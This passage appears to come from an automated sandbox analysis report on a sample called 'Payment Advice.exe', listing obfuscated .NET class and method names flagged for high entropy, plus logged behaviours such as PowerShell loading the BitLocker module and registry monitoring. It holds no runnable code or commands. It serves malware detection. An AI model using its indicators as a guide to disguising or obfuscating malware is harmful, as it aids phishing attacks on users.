                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, oWqsALsW1iwXN1h3kju.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HluZG81wAQ', 'JfZZi2UUTl', 'JLdZMxFH25', 'ma7ZZKOKso', 'OeqZPp96Is', 'PsgZ0JNqOQ', 'gWvZrPjGiW'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, DxAo2jOv4eQMN8950u.csHigh entropy of concatenated method names: 'LvEU3jvRfy', 'I9SUEXdxYO', 'QVajwrf9Un', 'EDkjsEQR77', 't4mUmPLAiL', 'nKjURPxkPk', 'jcoUCZ2SPU', 'S5tULm2Dmn', 'Q8nU8kiD3s', 'bD0UcpPVCI'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, cHCrHP7pHPpQHmwNll.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Q6egI7qio2', 'DDOgEujtMV', 'f3IgzkK6LJ', 'hSMKw0hvRj', 'kMuKsuc6xh', 'd9XKgevibc', 'pcvKKLLZrA', 'y4SL4pNJUfERROE0Eso'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, c7HHP8tld33bUMM6HI.csHigh entropy of concatenated method names: 'Dispose', 'iLAsILSqXB', 'b51gepU8RB', 'cJu7pLcNv6', 'AiBsEu7P8r', 'f4MszrhBZd', 'ProcessDialogKey', 'tungwH4ota', 'WRlgsJOKv3', 'VO2ggb7kjX'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, IH4otaIoRlJOKv3OO2.csHigh entropy of concatenated method names: 'bqbGhCxYpb', 'R9VGeyFgsu', 'FDJG63dPBj', 'DZ7Gn35pUt', 'ByOGQ8X2Zk', 'nOnGHuKcsh', 'mo9Gx6X1FD', 'IuaGNdvpc8', 'KoXGvOawAf', 'LJ8GSpjOSv'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, LRRNOAswi6QDbTcFmFG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2xim88VxS', 'ysaiRk0X2d', 'yPxiCoZss2', 'lHEiLXgVUW', 'K4Pi8GHaj2', 'MuZick8hyl', 'nV6i5FV1JX'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, UwINc6WPeWx2cQLcGX.csHigh entropy of concatenated method names: 'dMosD0od1G', 'VNNs9lKZ74', 'AGxskiEDr0', 'N8vsJoQqfd', 'ICNs4Gclkn', 'yMQsfr7NFD', 'QvbD4e3XQGZ0dY5MS2', 'MCiZxFHodbeJNdcgrb', 'ROqssdWaPj', 'IWbsKfgnL9'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, PlaOlGx5mN833C3ruy.csHigh entropy of concatenated method names: 'uMDDuLugr7', 'NJqD7lgHvf', 'rVJDyxEtS8', 'uRtyEwoDOC', 'wj5yzo1nXP', 'zO8Dwpgsu3', 'sMeDsLTTD5', 'H6sDgsVx9q', 'ck0DKq40dS', 'kBiDWOVwWb'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, nXdkee5FZdtlC42u5A.csHigh entropy of concatenated method names: 'EcvUk3ICZA', 'AbkUJ4vcr5', 'ToString', 'zI7UuslB3N', 'oJAUtRQYLC', 'GFlU7Decus', 'UU7UFIw4Gr', 'TWFUyUQRwC', 'mMjUDXDZb7', 'PR9U9NVo96'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, GivQ3LLx62vMKmY2FE.csHigh entropy of concatenated method names: 'DjW4SiQV8q', 'Cfh4Raqkcf', 'tYV4LIDIQU', 'DXX48V9o4O', 'qEQ4e9edCo', 'dJc46DY3eE', 'yrF4noh3cj', 'nL34QwlLou', 'oQP4HAmSlJ', 'coy4x1BTZa'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.csHigh entropy of concatenated method names: 'PWjKTrSW51', 'lbaKus9gkL', 'BsdKtFlqL5', 'zwOK7oIOPC', 'yNFKFXmyxs', 'YC8KyTj51L', 'owKKDVVuiO', 'vc9K91KvRO', 'Pi3KaIKjor', 'ExVKk1YByn'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, Bkn1MQhr7NFDffWBKY.csHigh entropy of concatenated method names: 'yyXyTmQdfj', 'CHUytQZZ6F', 'gRvyFBmVIs', 'PmPyDbsAG5', 's2Fy9At8Ur', 'Xu6FAhSNk7', 'UavFOTXZ57', 'tRlFowAO3D', 'IXOF3iphBM', 'T13FIGyYik'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, u24XxM8uRIoTpav9E2.csHigh entropy of concatenated method names: 'Ios4oGXpVE', 'JaS43scBeL', 'TBt4IZVdnL', 'Nnk4EH0nCN', 'u77xs4dgjMve3awyxvI', 'O3tkUMdP1ohbgdHMHYI', 'nJx62sdojb8rgr5eyNK', 'QBh6ypdfVqfP5J2x7Rr'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, V0od1GpONNlKZ74lAd.csHigh entropy of concatenated method names: 'oS3tLhb6ui', 'wnSt81ZogZ', 'niytc7xIW5', 'PkZt5RaBEy', 'pW7tA9Ks8u', 'r5OtOeiP7L', 'i67toF6ibk', 'VhVt3sAdi3', 'lp2tI0WnR1', 'r4ltEeq9p8'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, cLBVf8vxft4stwplCk.csHigh entropy of concatenated method names: 'uElDYUnniX', 'qogD1XJsBH', 'tioDVn8w2Y', 'FH4D2lL56N', 'JJqDBE6415', 't9YDlYQY0r', 'FJTDb9UAn3', 'CVHDpbkaFi', 'JBVDqG6yfg', 'CjYDdZpFKD'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, V1TjnGssHvunMsGa5Eb.csHigh entropy of concatenated method names: 'F76iEa8fgP', 'ceFizyETVh', 'A3RMwjioeJ', 'YwyMsUdBrI', 'sF0MgwYuOY', 'YQUMKETxmp', 'Xb9MWXh4Hh', 'pHwMTEuCc3', 'lFRMuSQhnO', 'BmMMtN1dst'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, Tmqavsg8mMuu42rPYF.csHigh entropy of concatenated method names: 'gBEVYjiLK', 'vDp21M1HV', 'PPll7Bbmq', 'sfGbUrCKj', 'nw5qNo1PP', 'FE8dG5wEe', 'qikmx7lMJdk2CscBwb', 'DcWTOK2vGElA0VANfu', 'C2djIZ4UW', 'Nu4irNR9L'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, e0GJdvoX7FLALSqXBB.csHigh entropy of concatenated method names: 'Dd9G4GrfyS', 'N1QGUR1VYv', 'VEbGGPruDn', 'qSCGMqqJoK', 'jOFGPSBcJ7', 'HyvGrEnRVI', 'Dispose', 'VFtjuhdk7F', 'm37jtMfqL6', 'YDyj7SNKlk'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, D7kjX5E8wnBR9dmFol.csHigh entropy of concatenated method names: 'vRBi7GLes8', 'tCPiFW8OMc', 'aeuiyIphdE', 'FhOiDjfv2O', 'gmQiGTJa1Z', 'iDDi9Wkdwk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, mLmW3OCpnpqE18nJXc.csHigh entropy of concatenated method names: 'TdlXpRo1yS', 'LKnXqqTky2', 'fmMXhJjOi7', 'xekXedIG9D', 'xahXnZt4yI', 'zp9XQ7URUX', 'J2UXxc0chi', 'yALXNNAHme', 'DVAXSfVHR9', 'CbpXmZN84s'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, D9fIhtzgI70fuFLfL8.csHigh entropy of concatenated method names: 'UJ4ilxbfNo', 'v6YipWwTKI', 'dIqiqGfbf5', 'IvMihj75aU', 'W1Bie6rgXs', 'HmSin84mgV', 'f9AiQxweq4', 'vIVirkAcEW', 'aijiYE8CSP', 'AWvi1XRxQR'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, JqfdkMd0ddEo7nCNGc.csHigh entropy of concatenated method names: 'ReLFBZWsIW', 'kjNFbN0ZCu', 'tRK76TZni3', 'Ifs7nVV66h', 'r4G7QGvEvO', 'HjA7HUKq2H', 'TAa7xeXT8Z', 'RZR7N4ud5F', 'yaR7vlAPDT', 'F117SIj26y'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, Xcvjh2qGxiEDr0S8vo.csHigh entropy of concatenated method names: 'IUW72xd9Uj', 'ivM7lRxutY', 'CZh7ph1X4N', 'i6f7qAiFxv', 'vnQ746FYok', 'Q0f7f8wLRh', 'lFX7U5fsXr', 'kKX7jpNWnQ', 'hcG7GvbnWa', 'Mft7i9ZnF9'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, oWqsALsW1iwXN1h3kju.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HluZG81wAQ', 'JfZZi2UUTl', 'JLdZMxFH25', 'ma7ZZKOKso', 'OeqZPp96Is', 'PsgZ0JNqOQ', 'gWvZrPjGiW'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, DxAo2jOv4eQMN8950u.csHigh entropy of concatenated method names: 'LvEU3jvRfy', 'I9SUEXdxYO', 'QVajwrf9Un', 'EDkjsEQR77', 't4mUmPLAiL', 'nKjURPxkPk', 'jcoUCZ2SPU', 'S5tULm2Dmn', 'Q8nU8kiD3s', 'bD0UcpPVCI'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, cHCrHP7pHPpQHmwNll.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Q6egI7qio2', 'DDOgEujtMV', 'f3IgzkK6LJ', 'hSMKw0hvRj', 'kMuKsuc6xh', 'd9XKgevibc', 'pcvKKLLZrA', 'y4SL4pNJUfERROE0Eso'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, c7HHP8tld33bUMM6HI.csHigh entropy of concatenated method names: 'Dispose', 'iLAsILSqXB', 'b51gepU8RB', 'cJu7pLcNv6', 'AiBsEu7P8r', 'f4MszrhBZd', 'ProcessDialogKey', 'tungwH4ota', 'WRlgsJOKv3', 'VO2ggb7kjX'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, IH4otaIoRlJOKv3OO2.csHigh entropy of concatenated method names: 'bqbGhCxYpb', 'R9VGeyFgsu', 'FDJG63dPBj', 'DZ7Gn35pUt', 'ByOGQ8X2Zk', 'nOnGHuKcsh', 'mo9Gx6X1FD', 'IuaGNdvpc8', 'KoXGvOawAf', 'LJ8GSpjOSv'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, LRRNOAswi6QDbTcFmFG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2xim88VxS', 'ysaiRk0X2d', 'yPxiCoZss2', 'lHEiLXgVUW', 'K4Pi8GHaj2', 'MuZick8hyl', 'nV6i5FV1JX'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, UwINc6WPeWx2cQLcGX.csHigh entropy of concatenated method names: 'dMosD0od1G', 'VNNs9lKZ74', 'AGxskiEDr0', 'N8vsJoQqfd', 'ICNs4Gclkn', 'yMQsfr7NFD', 'QvbD4e3XQGZ0dY5MS2', 'MCiZxFHodbeJNdcgrb', 'ROqssdWaPj', 'IWbsKfgnL9'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, PlaOlGx5mN833C3ruy.csHigh entropy of concatenated method names: 'uMDDuLugr7', 'NJqD7lgHvf', 'rVJDyxEtS8', 'uRtyEwoDOC', 'wj5yzo1nXP', 'zO8Dwpgsu3', 'sMeDsLTTD5', 'H6sDgsVx9q', 'ck0DKq40dS', 'kBiDWOVwWb'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, nXdkee5FZdtlC42u5A.csHigh entropy of concatenated method names: 'EcvUk3ICZA', 'AbkUJ4vcr5', 'ToString', 'zI7UuslB3N', 'oJAUtRQYLC', 'GFlU7Decus', 'UU7UFIw4Gr', 'TWFUyUQRwC', 'mMjUDXDZb7', 'PR9U9NVo96'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, GivQ3LLx62vMKmY2FE.csHigh entropy of concatenated method names: 'DjW4SiQV8q', 'Cfh4Raqkcf', 'tYV4LIDIQU', 'DXX48V9o4O', 'qEQ4e9edCo', 'dJc46DY3eE', 'yrF4noh3cj', 'nL34QwlLou', 'oQP4HAmSlJ', 'coy4x1BTZa'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.csHigh entropy of concatenated method names: 'PWjKTrSW51', 'lbaKus9gkL', 'BsdKtFlqL5', 'zwOK7oIOPC', 'yNFKFXmyxs', 'YC8KyTj51L', 'owKKDVVuiO', 'vc9K91KvRO', 'Pi3KaIKjor', 'ExVKk1YByn'
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, Bkn1MQhr7NFDffWBKY.csHigh entropy of concatenated method names: 'yyXyTmQdfj', 'CHUytQZZ6F', 'gRvyFBmVIs', 'PmPyDbsAG5', 's2Fy9At8Ur', 'Xu6FAhSNk7', 'UavFOTXZ57', 'tRlFowAO3D', 'IXOF3iphBM', 'T13FIGyYik'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, u24XxM8uRIoTpav9E2.csHigh entropy of concatenated method names: 'Ios4oGXpVE', 'JaS43scBeL', 'TBt4IZVdnL', 'Nnk4EH0nCN', 'u77xs4dgjMve3awyxvI', 'O3tkUMdP1ohbgdHMHYI', 'nJx62sdojb8rgr5eyNK', 'QBh6ypdfVqfP5J2x7Rr'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, V0od1GpONNlKZ74lAd.csHigh entropy of concatenated method names: 'oS3tLhb6ui', 'wnSt81ZogZ', 'niytc7xIW5', 'PkZt5RaBEy', 'pW7tA9Ks8u', 'r5OtOeiP7L', 'i67toF6ibk', 'VhVt3sAdi3', 'lp2tI0WnR1', 'r4ltEeq9p8'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, cLBVf8vxft4stwplCk.csHigh entropy of concatenated method names: 'uElDYUnniX', 'qogD1XJsBH', 'tioDVn8w2Y', 'FH4D2lL56N', 'JJqDBE6415', 't9YDlYQY0r', 'FJTDb9UAn3', 'CVHDpbkaFi', 'JBVDqG6yfg', 'CjYDdZpFKD'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, V1TjnGssHvunMsGa5Eb.csHigh entropy of concatenated method names: 'F76iEa8fgP', 'ceFizyETVh', 'A3RMwjioeJ', 'YwyMsUdBrI', 'sF0MgwYuOY', 'YQUMKETxmp', 'Xb9MWXh4Hh', 'pHwMTEuCc3', 'lFRMuSQhnO', 'BmMMtN1dst'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, Tmqavsg8mMuu42rPYF.csHigh entropy of concatenated method names: 'gBEVYjiLK', 'vDp21M1HV', 'PPll7Bbmq', 'sfGbUrCKj', 'nw5qNo1PP', 'FE8dG5wEe', 'qikmx7lMJdk2CscBwb', 'DcWTOK2vGElA0VANfu', 'C2djIZ4UW', 'Nu4irNR9L'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, e0GJdvoX7FLALSqXBB.csHigh entropy of concatenated method names: 'Dd9G4GrfyS', 'N1QGUR1VYv', 'VEbGGPruDn', 'qSCGMqqJoK', 'jOFGPSBcJ7', 'HyvGrEnRVI', 'Dispose', 'VFtjuhdk7F', 'm37jtMfqL6', 'YDyj7SNKlk'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, D7kjX5E8wnBR9dmFol.csHigh entropy of concatenated method names: 'vRBi7GLes8', 'tCPiFW8OMc', 'aeuiyIphdE', 'FhOiDjfv2O', 'gmQiGTJa1Z', 'iDDi9Wkdwk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, mLmW3OCpnpqE18nJXc.csHigh entropy of concatenated method names: 'TdlXpRo1yS', 'LKnXqqTky2', 'fmMXhJjOi7', 'xekXedIG9D', 'xahXnZt4yI', 'zp9XQ7URUX', 'J2UXxc0chi', 'yALXNNAHme', 'DVAXSfVHR9', 'CbpXmZN84s'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, D9fIhtzgI70fuFLfL8.csHigh entropy of concatenated method names: 'UJ4ilxbfNo', 'v6YipWwTKI', 'dIqiqGfbf5', 'IvMihj75aU', 'W1Bie6rgXs', 'HmSin84mgV', 'f9AiQxweq4', 'vIVirkAcEW', 'aijiYE8CSP', 'AWvi1XRxQR'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, JqfdkMd0ddEo7nCNGc.csHigh entropy of concatenated method names: 'ReLFBZWsIW', 'kjNFbN0ZCu', 'tRK76TZni3', 'Ifs7nVV66h', 'r4G7QGvEvO', 'HjA7HUKq2H', 'TAa7xeXT8Z', 'RZR7N4ud5F', 'yaR7vlAPDT', 'F117SIj26y'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, Xcvjh2qGxiEDr0S8vo.csHigh entropy of concatenated method names: 'IUW72xd9Uj', 'ivM7lRxutY', 'CZh7ph1X4N', 'i6f7qAiFxv', 'vnQ746FYok', 'Q0f7f8wLRh', 'lFX7U5fsXr', 'kKX7jpNWnQ', 'hcG7GvbnWa', 'Mft7i9ZnF9'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, oWqsALsW1iwXN1h3kju.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HluZG81wAQ', 'JfZZi2UUTl', 'JLdZMxFH25', 'ma7ZZKOKso', 'OeqZPp96Is', 'PsgZ0JNqOQ', 'gWvZrPjGiW'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, DxAo2jOv4eQMN8950u.csHigh entropy of concatenated method names: 'LvEU3jvRfy', 'I9SUEXdxYO', 'QVajwrf9Un', 'EDkjsEQR77', 't4mUmPLAiL', 'nKjURPxkPk', 'jcoUCZ2SPU', 'S5tULm2Dmn', 'Q8nU8kiD3s', 'bD0UcpPVCI'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, cHCrHP7pHPpQHmwNll.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Q6egI7qio2', 'DDOgEujtMV', 'f3IgzkK6LJ', 'hSMKw0hvRj', 'kMuKsuc6xh', 'd9XKgevibc', 'pcvKKLLZrA', 'y4SL4pNJUfERROE0Eso'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, c7HHP8tld33bUMM6HI.csHigh entropy of concatenated method names: 'Dispose', 'iLAsILSqXB', 'b51gepU8RB', 'cJu7pLcNv6', 'AiBsEu7P8r', 'f4MszrhBZd', 'ProcessDialogKey', 'tungwH4ota', 'WRlgsJOKv3', 'VO2ggb7kjX'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, IH4otaIoRlJOKv3OO2.csHigh entropy of concatenated method names: 'bqbGhCxYpb', 'R9VGeyFgsu', 'FDJG63dPBj', 'DZ7Gn35pUt', 'ByOGQ8X2Zk', 'nOnGHuKcsh', 'mo9Gx6X1FD', 'IuaGNdvpc8', 'KoXGvOawAf', 'LJ8GSpjOSv'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, LRRNOAswi6QDbTcFmFG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2xim88VxS', 'ysaiRk0X2d', 'yPxiCoZss2', 'lHEiLXgVUW', 'K4Pi8GHaj2', 'MuZick8hyl', 'nV6i5FV1JX'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, UwINc6WPeWx2cQLcGX.csHigh entropy of concatenated method names: 'dMosD0od1G', 'VNNs9lKZ74', 'AGxskiEDr0', 'N8vsJoQqfd', 'ICNs4Gclkn', 'yMQsfr7NFD', 'QvbD4e3XQGZ0dY5MS2', 'MCiZxFHodbeJNdcgrb', 'ROqssdWaPj', 'IWbsKfgnL9'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, PlaOlGx5mN833C3ruy.csHigh entropy of concatenated method names: 'uMDDuLugr7', 'NJqD7lgHvf', 'rVJDyxEtS8', 'uRtyEwoDOC', 'wj5yzo1nXP', 'zO8Dwpgsu3', 'sMeDsLTTD5', 'H6sDgsVx9q', 'ck0DKq40dS', 'kBiDWOVwWb'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, nXdkee5FZdtlC42u5A.csHigh entropy of concatenated method names: 'EcvUk3ICZA', 'AbkUJ4vcr5', 'ToString', 'zI7UuslB3N', 'oJAUtRQYLC', 'GFlU7Decus', 'UU7UFIw4Gr', 'TWFUyUQRwC', 'mMjUDXDZb7', 'PR9U9NVo96'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, GivQ3LLx62vMKmY2FE.csHigh entropy of concatenated method names: 'DjW4SiQV8q', 'Cfh4Raqkcf', 'tYV4LIDIQU', 'DXX48V9o4O', 'qEQ4e9edCo', 'dJc46DY3eE', 'yrF4noh3cj', 'nL34QwlLou', 'oQP4HAmSlJ', 'coy4x1BTZa'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.csHigh entropy of concatenated method names: 'PWjKTrSW51', 'lbaKus9gkL', 'BsdKtFlqL5', 'zwOK7oIOPC', 'yNFKFXmyxs', 'YC8KyTj51L', 'owKKDVVuiO', 'vc9K91KvRO', 'Pi3KaIKjor', 'ExVKk1YByn'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, Bkn1MQhr7NFDffWBKY.csHigh entropy of concatenated method names: 'yyXyTmQdfj', 'CHUytQZZ6F', 'gRvyFBmVIs', 'PmPyDbsAG5', 's2Fy9At8Ur', 'Xu6FAhSNk7', 'UavFOTXZ57', 'tRlFowAO3D', 'IXOF3iphBM', 'T13FIGyYik'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
